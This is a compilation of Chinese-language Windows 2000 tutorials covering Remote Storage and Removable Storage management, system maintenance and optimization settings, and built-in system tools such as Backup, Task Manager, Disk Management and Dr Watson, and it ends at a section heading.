    步骤2 打开远程存储
    步骤3 请按照"远程存储安装向导"的指示操作，安装完毕 如图 9.11

注意：
  §　在安装远程存储后第一次打开它时，远程存储安装向导会指导您按照所需步骤全部完成配置以便进行操作。
  §　请对预先确定想用于远程存储的媒体类型，因为以后不能改变。
  §　不要在 Windows 服务器群集上安装"远程存储"。
    通过远程存储管理器您可以进行以下操作：
§　查看或设置"远程存储"的属性
§　监视"远程存储"的任务
§　查看"远程存储"的事件
§　管理本地磁盘卷
§　管理远程存储媒体

9.4 可移动存储
    "可移动存储"使您可以轻松地跟踪可移动存储媒体（磁带或磁/光盘），并管理硬件库，如更换器和自动光盘机。"可移动存储"标注、分类并跟踪媒体；控制库驱动器、插槽和门；并且提供驱动器清洗操作。"可移动存储"与数据管理程序（如"备份"）协同工作。使用数据管理程序可管理存储在媒体上的实际数据。"可移动存储"使多个程序可以共享相同的存储媒体资源，从而减少您的开销。"可移动存储"将库中的所有媒体组织到不同的媒体池中。"可移动存储"也会在媒体池之间移动媒体，以提供应用程序需要的数据存储空间。
    "可移动存储"不提供卷管理，如带区。可移动存储也不提供文件管理，例如数据备份或磁盘扩展器操作。这些服务由数据管理应用程序（例如"备份"或"远程存储"）完成。（"远程存储"在运行 Windows 2000 Professional 的计算机上不可用。）必须在连接到库的同一台计算机上运行所有数据管理程序。"可移动存储"不支持在连接到相同库的不同计算机上运行的多个数据管理程序。
    §　"可移动存储"组件
    "可移动存储"由管理接口，即 Microsoft 管理控制台 (MMC) 管理单元、带有 API 的 Windows 2000 服务以及数据库组成。"可移动存储"服务通过 API 向数据管理程序提供媒体服务。下图显示可移动存储、数据管理程序、库与 Windows 2000 之间的关系。

可以使用"可移动存储"管理单元执行下列任务：
  §　创建媒体池并设置媒体池属性
  §　插入和弹出自动库中的媒体
  §　装入和卸除媒体。
  §　查看媒体和库的运作状态。
  §　执行库的列出清单操作。
  §　为用户设置安全权限。
§ 库
    在其最简单的形式中，库是由数据存储媒体和用于读写该媒体的设备组成。由"可移动存储"安装管理的一组库及其相关媒体叫做"可移动存储系统"。库主要有两种类型：
  §　"自动库"是拥有多个磁带或磁/光盘的一些自动单元（有一些拥有多个驱动器）。这些库有时称为"更换器"或"自动光盘机"，并且一般使用自动子系统或驱动器机架以移动存储在库存储插槽中的媒体。驱动器机架定位所需的磁带或磁/光盘，将其装入可用驱动器中，在任务完成后将其返回分配的存储插槽。自动库也可以包括"可移动存储"所管理的其他硬件组件（例如门、插入/弹出端口、清洗磁带和条码阅读器）。
  §　"独立驱动器库"或"独立驱动器"都是单驱动器、非自动单元（如磁带机或 CD-ROM 驱动器），它们均具可装入单个的磁带或磁/光盘。对于这些驱动器单元，可手工插入磁带或磁/光盘。
    可移动存储不仅能够管理多个库，还能够跟踪库中当前不包含的脱机媒体。

§　 媒体池
    媒体池是应用相同管理属性的磁带或磁/光盘的集合。"可移动存储"系统中的所有媒体均属于媒体池，每个媒体池只包含一种类型的媒体。数据管理程序使用媒体池访问库中的指定磁带或磁/光盘。
    使用媒体池可以定义应用于一组媒体的属性。因为"可移动存储"允许多个程序共享单个库中的相同媒体，所以这一点十分有用。一个库可以包含不同媒体池中的媒体，每一个都具有不同的属性。单一的媒体池可以跨越多个库。也可以创建分层的媒体池，即包含其他媒体池的媒体池。例如，您可以为程序所需的每种特定媒体类型建立一个媒体池，然后创建另一个包含这些媒体池的媒体池。媒体池可以包含媒体或其他的媒体池，但不能同时包含这两者。
    可移动存储系统提供了两种类型的媒体池：系统和应用程序。
  §　系统媒体池包括可用媒体池、无法识别媒体池和导入媒体池。"可移动存储"在您的"可移动存储"系统中给每种媒体类型创建一个可用媒体池、一个无法识别媒体池和一个导入媒体池。系统媒体池用于管理应用程序当前未使用的媒体。
  §　应用程序媒体池由数据管理程序创建，例如"备份"和"远程存储"。

§　媒体标识
    "可移动存储"使用两种标识方法跟踪媒体和列出清单：媒体上的标识符和条码。
  §　媒体上的标识符
    当磁带或者磁/光盘第一次插入库的时候，媒体上的标识符以电子方式记录到媒体上。当下一次将媒体插入库中时，"远程存储"使用媒体上的标识符来识别并跟踪磁带或磁/光盘。
  §　条码
    如果库支持条码，则"可移动存储"可以使用它们来标识媒体。带条码的媒体也有位于媒体上的标识符，可移动存储可以使用其中的任意一个。使用条码跟踪媒体一般要快得多，原因是在读取媒体上的标识符时不必装入每个磁带或磁/光盘。

9.4.1 管理库
§　启用或禁用库
    步骤1 打开"可移动存储"，如图 9.12
    步骤2 在控制台树中，双击"物理位置"。
    步骤3 右键单击要启用或禁用的库，然后单击"属性"。

屏幕上出现该库的"属性"对话框，如图 9.13
    步骤4 在"常规"选项卡上，确认"启用库"复选框已被选中。
或者，要禁用库，请清除"启用库"复选框。
    在"属性"对话框中还可以执行以下任务：
  §　启用或禁用驱动器
  §　更改库媒体类型
  §　检查库的清单
  §　设置默认的库清单
  §　打开库门
  §　设置库门和端口超时
  §　清洗独立驱动器
  §　清洗自动库

9.4.2 管理媒体池
§ 创建新媒体池
    步骤1 打开"可移动存储"
    步骤2 在控制台树中，右键单击"媒体池"，再单击"创建媒体池"，如图 9.14
或者，要在另一个媒体池中创建新的媒体池，请右键单击适用的媒体池，然后单击"创建媒体池"。
    步骤3 在"常规"选项卡的"名称"中输入新媒体池的名称，然后在"描述"中输入相关说明。
    步骤4 在"媒体信息"下，单击"包含的媒体类型"，然后在列表中选择适当的媒体类型。
    步骤5 在"配置/解除分配策略"下，执行以下操作：
  §　要在需要时从可用媒体池中自动抽取未使用的媒体，请选中"从空闲媒体池中抽取媒体"复选框。
  §　要在不需要时将媒体自动返回到可用媒体池，请选中"将媒体返回到空闲媒体池"复选框。

  §　要设置该媒体池中媒体的分配限制，请选中"限制重新分配"复选框，然后根据需要更改默认值。

    对创建的媒体池您可以执行以下操作：
  §　删除应用程序媒体池
  §　从可用媒体池中自动抽取媒体
  §　将媒体自动返回可用媒体池
  §　设置媒体池的分配限制

9.4.3 管理磁带和磁/光盘
§ 启用或禁用磁带或磁/光盘
    步骤1 打开"可移动存储"
    步骤2 在控制台树中，单击"媒体"。
    步骤3 在详细信息窗格中，右键单击磁带或磁/光盘，再单击"属性"。
    步骤4 在"媒体"选项卡上，确认"启用媒体"复选框已被选中。
或者，要禁用磁带或者磁/光盘，请清除"启用媒体"复选框。
    您还可以对磁带和磁/光盘执行以下任务：
  §　将媒体移到另一个媒体池
  §　插入磁带或磁/光盘
  §　从独立驱动器中弹出磁带或磁/光盘
  §　从自动化库中弹出磁带或磁/光盘
  §　装入磁带或磁/光盘
  §　从独立驱动器上卸除磁带或磁/光盘
  §　从自动库中卸除磁带或磁/光盘

    9.4.4 管理操作员请求和排队工作
§ 响应操作员请求
    步骤1 打开"可移动存储"
    步骤2 在控制台树中，单击"操作员请求"。
    步骤3 在详细信息窗格中，右键单击适当的请求，然后执行下列操作之一：
  §　要完成该请求，请单击"完成"，然后在提示时执行该操作。
  §　要取消请求，请单击"拒绝"。
    您还可以对管理操作员请求和排队工作执行以下任务：
  §　更改操作员请求的显示方式
  §　删除操作员请求
  §　取消工作队列中的挂起操作
  §　更改工作队列中的装入顺序

    9.4.5 管理可移动存储的安全性
§ 更改"可移动存储"的用户权限
    步骤1 打开"可移动存储"
    步骤2 在控制台树中，右键单击要更改其用户权限的特定项目，再单击"属性"。
    步骤3 在"属性"对话框中，单击"安全"选项卡，如图 9.15
    步骤4 单击您想要更改权限的用户或组的名称，然后执行下列操作之一：
  §　要更改特定的权限，请选中或清除每个三级访问权限的"允许"或"拒绝"复选框："使用"、"修改"和"控制"。
  §　要拒绝所有权限，请单击"删除"。

§ 添加访问"可移动存储"的用户
    步骤1 打开"可移动存储"
    步骤2 在控制台树中，右键单击要添加访问用户的特定项目，然后单击"属性"，如图 9.16
    步骤3 在"安全"选项卡上，单击"添加"。
    步骤4 在"选择用户、计算机或组"对话框的"名称"中，单击适当的用户或组，再单击"添加"，然后单击"确定"。
    步骤5 单击刚刚添加的用户或组名，然后执行以下任一项操作：
  §　要更改特定的访问权限，请选中或清除每个三级访问权限的"允许"或"拒绝"复选框："使用"、"修改"和"控制"。
  §　要拒绝所有访问权限，请单击"删除"。

返回


探索Windows 2000——系统的优化与维护

《一键清理系统垃圾》

探索Windows 2000——系统的优化与维护

    一、概述
    维护智能化：作为全新的系统，Win2000在系统维护方面的智能化程度非常高，该系统的一个显著特点是它会自动保护自身的系统文件不会被应用程序的安装文件所覆盖，这样就可以充分保证整个系统的安全运行。此外，新的系统在内存管理方面进行了很大的改善，这样一来即使这个程序发生了崩溃，系统和当前运行的其他应用程序也不会受到影响，这对于保护用户数据是非常重要的。
    自动修复：Win2000也提供了修复系统功能，这项功能需要使用到Win2000的安装光盘。Win2000自动修复虽然是在DOS模式下运行，但是它提供中文界面，使用起来非常简单。而在此我们也提醒一点，实际上对于系统维护，最好的方式还是进行系统备份，建议使用系统提供的创建应急盘和完全备份功能对系统进行彻底备份，这样就不用害怕系统出错了。
    丰富的维护工具：另一方面，针对系统管理，Win2000提供了丰富的工具和设置，通过这些工具也可以创建一个稳定而安全运行的系统。对于用户可能经常用到的系统工具，一般都提供了基于Wizard（向导）方式的操作，并提供了详细的使用步骤说明，使用起来相当简单。而对于高级用户，系统也提供了相应的维护和管理工具。
    增强的帮助：在Win2000中为用户提供了一个详细的联机手册、Windows 2000入门丛书以及“疑难解答”，通过这些功能用户也可以从中学到一些解决系统故障或者是操作方面问题，在这一点上，也比以前的任何系统都完善。虽然这些帮助文件在许多方面的介绍都非常简单，但是你完全可以在请求技术支持之前试图自己解决问题。
    还是有不足：在使用过程中可以发现，虽然Win2000提供了比以前任何系统都强大的稳定性，但在某些方面仍然没有提供深入的优化设置，如针对DirectX的全部加速、针对某些CD－ROM的DMA优化、基于COM端口的传输速度优化等，当然这是出于系统稳定运行考虑。此时我们就只好自己动手优化了，但许多优化都需要用户直接修改系统注册表，这对于一般用户而言，有一定难度。
    二、增加/删除程序
    对于增加/删除程序，是我们最经常进行的操作。Win2000提供了很好的软件安装/卸载管理与Win2000系统程序组件的添加和删除功能，这项功能比Win9x要好一些。不过Win2000提供的系统程序组件添加和删除功能已经被大大削减了，你根本不能选择需要安装或卸载的Win2000基本程序。
    对于更改或删除程序，Win2000提供的卸载应用程序的管理功能更为简单实用，在此我们给出卸载应用程序的方法：
    1．单击“开始”菜单，选择“设置”、“控制面板”、“增加/删除程序”，启动程序，此时会出现如^16020201a^1所示界面，此时看到的是“更改或删除程序”标签项。
    2．从图1中可以看到，在该界面中列出了具有卸载功能的应用程序，单击其中的项目，程序会给出该应用程序的详细信息，包括程序所占用的磁盘空间、支持信息、使用频繁程度、上次使用日期等。
    3．如果须要删除当前的应用程序，可单击相应列表项中的“删除”按钮，程序会自动启动该程序的卸载程序，此时就可以开始应用程序的卸载操作了。如果须要添加或删除部分程序组件，可单击“更改”按钮，此时会启动该应用程序的安装文件，按照程序的提示操作就可以了。
    三、添加/删除Windows组件
    一般来讲，Win2000的智能化程序很高，它可以根据当前的系统状况自动配置好你需要使用的组件和程序，但是如果你须要手动添加，可从“添加/删除程序”功能实现。具体方法是：
    1．启动“添加/删除程序”窗口，切换到“添加/删除Windows组件”标签项，弹出^16020201b^2所示界面。
    2．在其中的“组件”列表框中选择需要添加的项目，再将Win2000的安装光盘放入CD－ROM中。单击“下一步”按钮，程序会自动完成相应软件的安装。
    从图2所示的界面中可以看到，Win2000提供的可供安装和卸载的组件非常有限，而且全部是针对网络用户的，一般用户根本使用不到。
    四、使用任务管理器
    Win2000提供了一个管理当前活动的应用程序和进程的工具——任务管理器。使用该工具可以查看当前活动的应用程序及其进程和监视计算机性能等。该程序可使用多达15个参数评估正在运行的进程的活动以及查看当前CPU和内存使用情况的图形和数据。使用该工具也是关闭系统中停止相应的应用程序的必由之路。
    关闭程序：在Win2000的使用过程中，虽然系统本身很稳定，但是应用程序崩溃和停止响应也时常会发生，对于崩溃，系统会自动关闭，但是对于应用程序没有响应，系统并不能自动识别，此时只有使用任务管理器来结束它的运行。该项操作的具体方法很简单：在系统任务条空白处单击鼠标右键，并从关联菜单中选择“任务管理器”，此时会出现如^16020201c^3所示界面。在该界面中的“应用程序”标签项列表框中给出了当前系统中运行的所有应用程序列表，选择相应的程序项，然后单击“结束任务”按钮即可关闭它。有时当应用程序停止响应后，系统任务条不可见，可按下“Ctrl＋Alt＋Del”键，系统会给出“Windows安全”窗口，单击界面中的“任务管理器”按钮也可以启动任务管理器。
    查看和关闭进程：如果任务管理器的任务列表中没有显示出需要关闭的应用程序，可切换到“进程”标签项，在该标签项中列出了当前系统内存中装载的所有应用程序进程列表，选择须要关闭的进程，之后单击“结束进程”按钮即可。如果你须要查看其他的进程信息，可单击程序界面菜单条“查看”项下拉菜单中的“查看列”命令，程序会给出一个“选择列”窗口，在其中提供了22个可供选择的查看项目，使用鼠标选择相应的查看项目，程序会自动将其添加到界面窗口中的。
    设置进程优先级：此外，如果是用鼠标右键单击“进程”标签项中的列表项，系统会给出如^16020201d^4所示关联菜单，在该菜单中除提供结束进程命令外，还提供了一个设置进程优先级功能，你可以自己定义应用程序进程在当前系统中的优先级。
    查看系统性能：在任务管理器中还提供了查看当前机器性能功能，查看方法也非常简单，启动“任务管理器”后，切换到“性能”标签项就可以了。在该界面中提供了当前CPU和内存使用情况的图表、计算机上正在运行的句柄、线程和进程的总数以及物理、核心和认可的内存总数的统计。
    五、Windows安全
    这是一项基于NT的安全管理功能，当在Win2000中按下“Ctrl＋Alt＋Del”键时，此时会清除当前屏幕，并给出“Windows安全”对话框，在其中提供了锁定当前计算机、注销当前用户、更改当前用户登录口令、启动任务管理器、关闭计算机等相关功能按钮。在此须要说明的是关于锁定计算机，如果你须要暂时离开机器而又不希望别人使用你的机器、并须要保留当前的工作状态时，可使用该项功能，这样其他用户就不能任意使用你的机器了，当你回来时可以重新登录，系统也会恢复锁定前的工作状态。不过当用户以其他身份登录Win2000后，你的工作环境就会丢失。
    六、修复磁盘错误
    Win2000并没有提供Win9x中出现的Scandisk磁盘扫描程序，它使用的是Check Disk，该程序针对不同的分区格式提供了不同的程序——chkdsk.exe和chkntfs.exe，前者是基于FAT16/32的，后者是基于NTFS的。对于磁盘扫描，与Win9x一样，如果你的系统没有正常退出，下次启动系统时，Check Disk会自动扫描相应的磁盘文件，并将丢失的磁盘信息保存成文件。
    扫描磁盘：在图形界面下，磁盘扫描程序并没有在开始菜单中提供，而是做到了磁盘的“属性”界面中。如果须要使用它扫描磁盘，可在“我的电脑”窗口中使用鼠标右键单击驱动器图标，并从关联窗口中选择“属性”命令。在打开的窗口界面中切换到“工具”标签项。单击“查错”项中的“开始检查”按钮，在弹出的界面中选择是否由程序自动修复文件系统错误以及让扫描程序试图恢复坏的磁盘扇区。之后单击“开始”按钮，系统会自动完成相应的扫描操作的。
    七、使用计算机管理
    计算机管理是Win2000提供的一个全面控制计算机的工具，该工具包括在系统的控制面板中，此外你也可以在系统开始菜单中的“运行”项关联界面中键入“compmgmt.msc”启动它，程序启动后的界面形式如^16020201e^5所示。从图中可以看到，在这个程序的界面中提供了几乎所有与计算机管理相关的功能，包括系统工具、时间查看器、系统信息、性能日志和警报、共享文件夹、设备管理器、本地用户和组、服务和应用程序、存储及可移动储存、磁盘碎片整理等，几乎包括了基于计算机管理的所有方面。这个工具采用类似资源管理器的双窗口界面形式，操作起来非常直观。
    “计算机管理”中提供的查看组件中的一个主要项目是“事件查看器”，在这个工具中包括了针对系统中的历次应用程序崩溃记录详细信息，其中包括应用程序的崩溃、意外中止、磁盘扫描、更改的设备设置、数据在硬件之间的传输失败、驱动程序更新纪录等信息，通过这个工具你可以详细了解当前机器的使用状况。
    在“服务”项中提供了可以在远程和本地计算机上开始、停止、暂停或继续服务，通过该工具还可以为特定的硬件配置文件启用或禁用服务。“服务”是一项非常有用的功能，通过它你可以禁止一些Win2000启动时默认加载的文件，如果你对自己的系统有足够的了解，可以禁止启动系统不使用的应用程序文件，这样可以在很大程度上节省系统资源，加快系统运行速度。
    八、设置多重启动引导菜单及修复Win2000
    如果你在系统中安装了多个操作系统，并使用Win2000的启动引导菜单，现在可在Win2000中对其进行配置。具体方法是：使用鼠标右键单击“我的电脑”，从关联菜单中选择“属性”，激活“系统特性”界面，切换到“高级”标签项，单击界面中的“启动和故障恢复”按钮，此时会弹出一个界面窗口。在该界面中提供了系统启动时可默认引导的启动项目，如启动菜单显示时间、启动失败处理方式、写入调试信息的方式等，根据自己的需要选择设置即可。
    与Win9x类似，当在Win2000启动时按下“F8”键可激活启动菜单。在这个菜单中提供了所有的启动选项，包括：安全模式、带网络连接的安全模式、带命令提示的安全模式、启用启动日志、启用VGA模式、最后一次正确的配置、目录服务恢复模式、调试模式、正常启动等，你可以根据自己的需要来选择要进行的启动项目。
    此外，Win2000提供了重新安装时修复受损的Windows功能，通常这项功能是用来校验并重新复制被修改的重要系统文件，以保证系统能够正常运行。如果要使用该项功能，可按照安装Win2000的安装步骤进行操作。当复制文件完成后出现修复询问界面时，选择修复Windows，并依据自己的需要，选择使用故障恢复控制台修复Win2000安装，或使用紧急修复过程修复Windows 2000的安装。对于普通用户可选择后者，之后选择自动或是手工修复，安装程序会自动完成文件修复任务并重新引导系统启动的。
    九、调整拨号上网设置
    虽然很早就有人说Win2000中的拨号上网已经进行了足够的优化，但是当Win2000安装完成后，如果你从设备管理中查看COM端口的速度，发现还是9600bps，所以安装完Modem后必须调整这个设置。具体方法是：使用鼠标右键单击“我的电脑”，从关联菜单中选择“属性”，系统会给出“系统特性”窗口。依次选择“硬件”、“设备管理器”，系统会给出“设备管理器”窗口。使用鼠标双击Modem所连接的端口，激活相应端口属性界面。切换到“端口设置”标签项，在其中的“每秒位数”下拉文本框中设置使用最大值“128000”，并将“流控制”设置为“硬件”，然后保存设置退出即可。
    十、设置硬盘的写入缓存
    Win2000针对硬盘提供了一个“写入缓存”设置，通过这项设置可以提高硬盘的写入数据速度。不过据Win2000的说明文件讲，设置使用该项功能后，当系统没有正常关闭时将增大损坏磁盘的机会。如果你须要打开这项开关，可首先激活系统的“设备管理器”窗口，打开窗口中的“磁盘驱动器”，此时窗口中会给出系统中安装的所有硬盘设备列表。双击其中硬盘图标，激活相应的属性窗口，切换到“磁盘属性”标签项，选择“启用了写入缓存”启动它，然后单击确定按钮退出，并重新引导系统启动即可。
    十一、调整虚拟内存交换文件
    Win2000允许用户将虚拟内存交换文件分成几部分存放到不同的硬盘或硬盘分区中，当然这不是系统的默认选项，但是使用此项设置可以在一定程度上提高系统的反应速度。如果需要更改系统的虚拟内存交换文件，可首先激活“系统特性”窗口（即启动“控制面板/系统”项），之后切换到“高级”标签项，单击界面中的“性能选项”按钮，此时会出现如^16020201f^6所示界面。在该界面的应用程序响应项中，提供了两个复选框，其中“应用程序”表示系统为前台应用程序分配更高的优先级，“后台服务”表示系统为每个活动的应用程序分配相同的优先级，系统默认使用前者。单击该界面中的“更改”按钮，在弹出窗口中的“驱动器”列表框中，选择存放虚拟内存交换文件的硬盘分区。然后在“所选驱动器的页面文件大小”项中，设置当前硬盘或硬盘分区中可存放的虚拟内存，交换文件的初始大小和最大值。最后单击“设置”按钮使之生效。一般来讲，如果你的内存空间小于128MB，设置大小为1.5倍的内存空间就可以了。
    十二、管理登录用户
    一般来讲，在安装Win2000时会有一个登录用户的设置过程，而对于首次使用，系统也会默认以Administrator身份登录。除此之外，系统还提供了一个以Guest身份登录，使用这个身份可以查看部分网络。但是如果你的系统需要被多个用户使用，设置属于个人的登录身份和登录口令就非常必要。这样做最直接好处是可以保护每个用户使用数据的安全。以下我们给出设置新用户的方法：打开控制面板，单击其中的“用户和密码”图标，单击弹出界面中的“添加”按钮（^16020201g^7），系统给出“添加新用户”界面。这是一个Wizard方式的设置过程，依次设置登录用户的用户名、登录口令、可以授予当前用户何种级别的访问权限（其中包括标准用户、受限用户和其他）。最后单击“完成”按钮确定即可。在此需要说明的是，对于添加或删除用户，只有具有Administrator级别的用户才能操作。
    关于用户所属的组，在系统提供的“本地用户和组”工具中有详细的描述，由于全部为中文信息，在此就不详细给出了。如果需要查看，可在“用户和密码”界面中切换到“高级”标签项，单击界面中的“高级”按钮激活该项功能。实际上在此界面中，提供了更加全面的系统用户以及所属组别管理功能，你可在相应的列表项中单击鼠标右键，并从关联的右键菜单中选择需要的操作命令。


探索Windows 2000——系统工具

《一键清理系统垃圾》

探索Windows 2000——系统工具

    一、概述
    作为一个逐步发展起来的操作系统，Windows 2000 Professional继承了以前Win9x和WinNT的系统工具，不过在新的系统中这些工具在功能上和使用上也有了一些变化。如果你是从Win9x环境升级到Win2000的，会发现其中有许多新的工具，为我们带来了许多新的功能，给人耳目一新的感觉。此外，在使用上，Win2000中的许多工具力求给用户提供最简单的操作，毕竟Windows 2000 Professional是针对普通用户的，操作简单在系统中占有很重要的地位。
    保留的工具：在Win2000中，系统保留了一些原来在Win9x中提供的工具，如任务计划、磁盘清理、字符映射表、写字板、记事本、画图、代码转换工具、传真、媒体播放器、图像处理、计算器、屏幕放大镜等，这些工具的界面和操作方式基本上与Win9x环境下的工具完全一样。
    新增的工具：当然新系统也提供了一些全新的工具，如辅助工具管理器、屏幕键盘、辅助功能向导、聊天程序等。
    改进的工具：有些工具虽然从名称上看同以前一样，但无论是界面还是在功能上都有了本质的变化。比如新的磁盘碎片整理程序、全新的电话拨号程序、Net Meeting、备份、磁盘扫描程序、CD播放器、Internet连结向导、命令提示符、同步、系统信息等。
    重要的控制面板：Win2000另一个非常重要的变化是现在系统的控制面板变得非常重要，它现在真正成了系统的控制中心和维护中心。而且系统将许多原来分散在各个地方的工具和设置项目也集中到控制面板中了。如“打印机”、“任务计划”、“网络和拨号连结”、“管理工具”、“文件夹选项”、“传真”等。此外，系统也将原来的一些设置进行了重新归类，如“电话和调制解调器选项”、“键盘”、“输入法”、“区域设置”、“声音和多媒体”等。当然系统也新增加了几个项目，如“扫描仪和照相机”、“管理工具”等。如果你想很好地掌握Win2000，熟悉并掌握它的控制面板是至关重要的。
    二、系统备份与应急盘创建
    Win2000提供了一个全新的备份工具，毕竟Win2000是NT系统的继续，因此备份这个工具与Win9x中的同类工具相比在功能上有很大的提高。我们知道即使是再稳定的系统，拥有最完善的文件保护系统，防止数据丢失或系统崩溃的最好方法还是备份！这是任何其他的方法都不能替代的。如果你以前没有足够的重视，现在应该重新看待这个工具了。
    Win2000的备份工具功能非常强大，程序不但提供了针对硬盘文件的备份功能，而且提供了备份整个系统、备份系统状态数据功能，这两项功能都是针对Win2000系统自身的备份操作，可以有效地恢复Win2000而不必定期重新安装。
    Win2000中的备份工具提供的另一项重要功能是提供了创建系统的“紧急修复磁盘”，这并不是创建系统启动盘，这个紧急修复磁盘中保存的是系统文件和系统设置的信息，并没有任何备份文件或程序，使用它可以修复并重新启动损坏的Win2000。
    备份方法：Win2000的备份工具，针对不同的功能程序提供了相应的操作向导，使用比较简单。在此我们以备份系统状态数据为例，来看看如何对系统进行备份。备份系统状态数据就是备份系统注册表、系统启动文件等，这些都是保证系统运行的基本文件。以下是具体步骤：
    1．单击系统的“开始”按钮，依次选择“程序”、“附件”、“系统工具”、“备份”项，启动备份程序，此时会给出如^15020201a^1所示的欢迎窗口。从窗口中可以看到有三个功能按钮：“备份向导”、“还原向导”和“紧急修复磁盘”。单击“备份向导”按钮继续。
    2．程序给出一个说明界面，通知用户向导程序将协助备份，单击“下一步”按钮，在程序给出的界面中选择需要备份的对象，其中包括“备份整个Win2000系统”、“备份选定的文件、驱动器或网络数据”、“备份系统状态数据”三个复选框。选择“只备份系统状态数据”复选框。单击“下一步”按钮继续。
    3．此时出现备份文件保存位置设置窗口，在其中的“备份媒体或文件类型”文本框中设置备份文件的保存方式，其中包括保存路径和保存文件名。一般来讲，Win2000会默认将文件备份到可移动驱动器上，如磁带机、Zip驱动器、CD－RW上，不过一般用户可能没有这些设备，此时可以选择备份文件到硬盘指定路径下，至于备份文件类型，使用默认的＊.bkf即可。单击“下一步”按钮继续。
    4．程序给出“正在完成备份向导”界面，通知用户现在可以进行文件备份了。此时如果单击界面中的“完成”按钮即可开始文件备份操作。
    备份恢复：对于备份文件的恢复，可使用“备份”文件提供的“还原向导”实现，你只要选择好需要还原的备份文件，剩下的事情由程序自己完成就可以了。由于其操作方法非常简单，加上篇幅所限，在此不再介绍。
    创建紧急修复磁盘和系统启动盘：对于创建系统的紧急修复磁盘，只需要一张1.44MB的软盘即可完成，而且速度很快。在备份程序的欢迎窗口选择“创建紧急磁盘”项即可。
    Win2000也提供了创建系统启动盘功能，这项功能需要4张1.44MB的软盘，其中包括了重要的系统启动所必需的文件，这一点与Win9x提供的相应功能是不同的。具体制作方法比较简单，将Win2000的安装光盘放入CD－ROM中，直接运行光盘中“Bootdisk”路径下的“Makeboot.exe”文件即可。这是一个在DOS窗口模式下运行的程序，不过Win2000的DOS窗口提供中文支持，而且该工具也是用中文信息提示，具体操作步骤在此就不再介绍了。
    三、磁盘整理程序
    在Win2000中，系统提供了一个新的磁盘碎片整理程序。这个程序与Win9x下提供的磁盘碎片整理工具并不完全相同，它包括了基于磁盘的碎片情况分析、优化、状态报告等多种功能。该工具的界面窗口非常简洁，在程序窗口中直接提供了驱动器列表，以及常用的操作功能按钮。该工具的特点是操作简单、整理速度快，即使被整理的磁盘有访问操作，整理也不会中断。
    与Win9x中提供的相应工具不同，该工具启动后不会直接提供系统驱动器文件排列图示。如果你要了解当前磁盘的文件分配状态，可使用鼠标单击程序界面中的“分析”按钮，程序会自动扫描磁盘文件。另外程序也会扫描是否存在磁盘错误，如果有错误，程序会给出提示信息的。在完成磁盘分析后，程序也会给出是否需要进行磁盘碎片整理的优化建议对话框，单击该对话框中的“察看报告”按钮，可以了解当前磁盘中不完整排列的文件列表，单击“碎片整理”按钮，就可以开始磁盘碎片整理。
    四、系统信息管理程序
    系统信息管理程序是在Win9x中就已提供了，在新系统中这个程序的界面形式有了一些变化，使用过程中也可以发现，这个工具现在可以提供的检测项目比以前多出不少，而且提供的相关信息非常详细。
    从图3中可以看到，在程序界面的左边提供了需要统计信息的项目列表，其中包括的主要项目有当前机器中安装的所有硬件设备资源占用、硬件组件（所有硬件设备）、软件环境等。在“硬件资源”项中包括的项目有：冲突/共享、DMA、强制硬件、输入/输出、IRQs和内存，在这里用户可以了解到系统的资源占用信息。在“组件”项中包括的项目有：多媒体、显示卡、输入、调制解调器、网络、端口、存储、打印和USB、有问题的设备等，其中有包括了许多分项目。对于有些硬件如CD/DVD－ROM，程序还会提供测试数据。在“软件环境”项中提供的项目有：驱动程序、环境变量、网络连接、运行任务、程序组、启动程序和OLE注册等。在“系统信息”界面菜单条中的“工具”项下拉菜单中，提供了Windows中常用的系统工具，其中包括了磁盘清理、Dr Watson华生医生、硬件向导、网络连接、备份、文件签名验证程序、系统监视器、更新向导解除安装、Windows报告工具等，这都是需要经常使用的系统工具，直接选择即可。
    五、文件签名验证程序
    在“系统信息”窗口中提供的系统工具列表中，可以看到文件签名验证程序，取代了原来Win9x提供的系统文件检查器。通过该工具可以检查当前状态下系统基本文件，是否发生覆盖、是否存在非验证安装等。它的使用方法非常简单，打开程序后单击界面中的“启动”按钮，程序会自动开始检测系统的文件。如果发现异常，会给出扫描结果对话框，在其中会给出所有发现的未经过验证的文件列表。由于Win2000使用了数字签名技术，这项扫描过程非常快，而且也非常准确。此外，该工具界面中有一个“高级”按钮，单击它程序会给出相关设置界面，其中包括了使用的扫描方式和可扫描的对象设置、是否扫描未经过数字签名的文件、创建扫描日志文件的方式设置等，根据自己的需要选择即可。
    六、华生医生Dr Watson
    Dr Watson是从Win3.x就开始提供的工具，从那时开始，这个工具并没有任何改变。不过在Win2000中，这个工具已经有所改善，程序的功能也在很大程度上得以增强。当启动程序并在系统后台运行它时，会在程序发生错误时自动运行，为用户作出详细报告。按下该界面中的“确定”按钮，程序会自动解决该问题。另外，它也能够将出现的问题记录在一个名为Drwtsn32.log的文件中，便于用户查看以及向技术支持咨询。
    如果你在“运行”界面文本框中输入的是“Drwtsn32.exe”，此时会出现如^15020201d^4所示界面，从图中可以看到，在其中提供了程序的运行方式设置，如日志文件创建路径、保存信息方式、出错通知方式、应用程序出错记录等，非常详细。
    七、磁盘管理
    Win2000为我们提供了一个非常强大的磁盘管理工具——“磁盘管理”。通过这个工具可以有效的管理本机的硬盘或者是硬盘分区。该工具提供的所有功能都是针对硬盘的，其中包括格式化硬盘或硬盘分区、删除指定的逻辑驱动器、还原基本磁盘配置、查看磁盘属性、浏览指定磁盘、更改指定驱动器盘符等。由于系统将这些功能都集中到这个工具中，使用它管理磁盘非常方便。如果要使用它，可单击系统开始菜单，选择其中的“运行”命令，在关联的界面文本框中输入“diskmgmt.msc”然后击回车键确定，程序会给出如^15020201e^5所示界面。从图中可以看到，程序给出了所有的本机磁盘和磁盘分区列表，并给出了相应的磁盘状态信息。单击界面菜单条中的“操作”项，程序会给出一个关联菜单，在其中提供了针对硬盘的相关命令，根据自己的需要选择即可。
   八、CD播放器
    Win2000为我们提供了一个全新的CD播放器，该工具给我们的直观感受是程序的界面做得比以前漂亮多了（如^15020201f^6所示），使它看上去更像一台播放器面板，而不是一个Windows应用程序窗口。除提供标准界面外，程序还提供了一个小的播放面板，这样就便于在系统后台播放音乐而在前台对播放进行控制。从功能上讲，程序这次做得也非常不错，所有的播放控制功能都以按钮形状直接做到了界面上，使用鼠标就可以轻松控制，无论是播放还是选曲，都非常方便。CD播放器除提供本机Audio CD播放外，还提供了基于Internet的在线播放功能。此外，这个工具提供的“播放曲目编辑器”隐藏得比较深，如果不仔细查找，很难发现。
    九、电话拨号程序和局域网聊天工具
